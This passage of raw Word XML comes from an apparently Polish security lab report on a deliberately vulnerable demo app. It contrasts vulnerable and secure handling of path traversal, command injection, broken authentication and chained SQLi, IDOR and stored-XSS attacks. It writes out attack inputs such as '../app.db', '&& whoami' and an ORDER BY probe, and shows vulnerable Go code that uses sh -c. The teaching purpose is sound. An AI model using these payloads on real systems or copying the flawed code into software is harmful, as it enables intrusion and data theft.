          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>uploads/</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Warianty pokazowe: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?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?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?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br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2038" w:name="lst38"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 38. Żądanie HTTP odtwarzające scenariusz ataku. Źródło: materiał testowy opracowany na potrzeby weryfikacji.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2038"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Pierwszy payload próbuje pobrać bazę SQLite. Drugi pokazuje wyciek kodu źródłowego, w tym logikę seeda i nazwy tabel. Trzeci ujawnia zależności i wersje bibliotek, co ułatwia dalsze rozpoznanie.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343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raversal-vulnerab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30" w:name="fig30"/>
      <w:pPr>
        <w:spacing w:before="40" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Rysunek 30. Path Traversal vulnerable. Źródło: zrzut ekranu z aplikacji MikuMiku Fan Hub.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1030"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Ten sam krok w trybie secure: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Użytkownik wpisuje identyczne payloady: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>../app.db</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>../internal/db/db.go</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> i </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>../go.sum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>Handler normalizuje ścieżkę i sprawdza, czy wynik nadal znajduje się w katalogu uploadów.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Listing F.2 - kod zabezpieczony: odrzucenie ścieżki spoza uploads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candidate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ok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safeUploadPath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filename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ok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111827"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>message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"Path traversal blocked"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111827"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>isError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39" w:name="lst39"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 39. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2039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29146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raversal-secur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31" w:name="fig31"/>
      <w:pPr>
        <w:spacing w:before="40" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Rysunek 31. Path Traversal secure. Źródło: zrzut ekranu z aplikacji MikuMiku Fan Hub.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1031"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Ocena rezultatu:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> funkcja podglądu plików zostaje zachowana, ale serwer ogranicza ją do zamierzonego katalogu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="28" w:name="sec28"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>11.8. G. Command Injection w Stream relay check</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Funkcja strony:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> maintainer sprawdza, czy host streamu odpowiada przed wspólnym oglądaniem koncertu lub transmisji.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Poprawne użycie:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> operator wpisuje host, np. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>127.0.0.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, i otrzymuje wynik pojedynczego testu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ping</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Atak w trybie vulnerable:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:t>Użytkownik otwiera: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k</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111827"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>?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7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6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6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br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2040" w:name="lst40"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 40. Żądanie HTTP odtwarzające scenariusz ataku. Źródło: materiał testowy opracowany na potrzeby weryfikacji.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2040"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:t>Handler wykonuje:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Listing G.1 - kod niezabezpieczony: wykonanie polecenia przez `sh -c`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cmd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exec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Command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"sh"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"-c"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"ping -c1 "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>host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41" w:name="lst41"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 41. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2041"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&amp;&amp; whoami</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> staje się drugą komendą powłoki.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Bardziej efektowny payload robi mini-rozpoznanie hosta w jednym żądaniu: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k</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111827"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>?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7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;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;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br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2042" w:name="lst42"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 42. Żądanie HTTP odtwarzające scenariusz ataku. Źródło: materiał testowy opracowany na potrzeby weryfikacji.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2042"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">W trybie vulnerable wynik diagnostyki streamu zaczyna mieszać normalny </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ping</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> z wynikiem poleceń systemowych. To dobrze pokazuje, dlaczego </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sh -c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> z inputem użytkownika jest krytycznym błędem.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349758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mmand-vulnerabl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32" w:name="fig32"/>
      <w:pPr>
        <w:spacing w:before="40" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Rysunek 32. Command Injection vulnerable. Źródło: zrzut ekranu z aplikacji MikuMiku Fan Hub.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1032"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Ten sam krok w trybie secure:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:t>Ten sam input trafia do tej samej funkcji.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:t>Walidator blokuje metaznaki.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:t>Poprawny host jest wykonywany bez shella.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Listing G.2 - kod zabezpieczony: walidacja i wykonanie bez shella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validatePingHost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host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;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111827"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>message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"Command injection blocked"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111827"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>isError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out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exec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CommandContext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ctx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"ping"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"-c1"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host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CombinedOutput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43" w:name="lst43"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 43. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2043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63440" cy="323890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mmand-secur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238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33" w:name="fig33"/>
      <w:pPr>
        <w:spacing w:before="40" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Rysunek 33. Command Injection secure. Źródło: zrzut ekranu z aplikacji MikuMiku Fan Hub.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1033"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Ocena rezultatu:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> poprawka ogranicza zarówno wejście, jak i sposób wykonania komendy. Sama walidacja bez usunięcia </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sh -c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> byłaby słabsza.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="29" w:name="sec29"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>11.9. H. Broken Authentication w logowaniu użytkownika</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Funkcja strony:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/ui/login</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> jest normalnym formularzem logowania do konta.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Poprawne użycie:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> użytkownik podaje istniejący login i prawidłowe hasło. Aplikacja ustawia cookie sesyjne i pozwala korzystać z profilu, tworzenia postów oraz moderacji zgodnie z rolą.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Atak w trybie vulnerable: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Atakujący zna istniejący login, np. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>admin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>Wpisuje dowolne hasło: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username=admin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password=anything</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2044" w:name="lst44"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 44. Fragment materiału testowego (text). Źródło: materiał testowy opracowany na potrzeby weryfikacji.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2044"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:t>Serwer akceptuje użytkownika, bo sprawdza tylko istnienie loginu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Listing H.1 - kod niezabezpieczony: sprawdzenie tylko istnienia konta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exists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svc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UserExists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||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exists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"Invalid credentials"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StatusUnauthorized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fmt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Sprintf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"Login successful for %s"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false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StatusOK</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2045" w:name="lst45"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 45. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2045"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Ten sam krok w trybie secure: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Ten sam login i błędne hasło są wysłane do </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/ui/login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>Serwer pobiera hash bcrypt i porównuje hasło.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:t>Logowanie jest odrzucone.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Listing H.2 - kod zabezpieczony: walidacja hasła przez bcrypt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valid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svc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ValidateUserCredentials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password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"Database error"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StatusInternalServerError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valid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svc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RecordLoginFailure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"Invalid username or password"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StatusUnauthorized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46" w:name="lst46"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 46. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2046"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Ocena rezultatu:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> logowanie jest rzeczywistym mechanizmem sesji używanym później przez profil, moderację i tworzenie postów. Wersja secure weryfikuje sekret użytkownika i ogranicza próby logowania.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="30" w:name="sec30"/>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>12. Scenariusze złożone do weryfikacji</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Poniższe scenariusze pokazują efekt łańcuchowy: jeden błąd daje rozpoznanie, drugi umożliwia akcję, a tryb secure przerywa łańcuch na kilku poziomach.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="31" w:name="sec31"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>12.1. Łańcuch 1 - SQLi jako panel rozpoznania bazy</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Miku</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - normalne użycie wyszukiwarki.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>zz' ORDER BY 8 --</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - rozpoznanie liczby kolumn przez błąd SQL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sqlite_master</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - odczyt nazw tabel i instrukcji </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>CREATE TABLE</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>[intel] database map</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - jeden wiersz z liczbą użytkowników i listą tabel.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>[fingerprint] SQLite ...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - identyfikacja silnika i wersji bazy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>[pivot] admin owns drafts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - powiązanie konta administratora z ukrytymi draftami.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Vulnerable:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> zwykłe pole </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Library query</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> zamienia się w narzędzie rekonesansu bazy danych.  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Secure:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> każdy krok jest zwykłym tekstem w </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>LIKE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; brak błędu SQL, brak rekordów technicznych, brak danych spoza </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>published = 1</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="32" w:name="sec32"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>12.2. Łańcuch 2 - słabe logowanie + IDOR</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Atakujący loguje się jako </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>user1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> z dowolnym hasłem.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Przechodzi do </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/ui/moderation</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Wysyła </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>POST /ui/posts/delete/1</w:t>
      </w:r>
      <w:r>
        <w:t>, czyli usuwa cudzy wpis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Vulnerable:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hasło jest ignorowane, a usuwanie sprawdza tylko fakt zalogowania.  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Secure:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bcrypt odrzuca złe hasło, a nawet po prawidłowym logowaniu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>user1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> nie może usuwać wpisów admina.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="33" w:name="sec33"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>12.3. Łańcuch 3 - Stored XSS jako przejęcie interfejsu</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Atakujący dodaje komentarz z payloadem </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>insertAdjacentHTML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>Każdy czytelnik wpisu widzi fałszywą nakładkę "Session expired".</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:t>Ten sam mechanizm mógłby podmieniać linki, formularze albo treści widoku.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Vulnerable:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> komentarz jest raw HTML i wykonuje kod w przeglądarce ofiary.  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Secure:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> event handler jest usuwany, a HTML jest escapowany.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="34" w:name="sec34"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
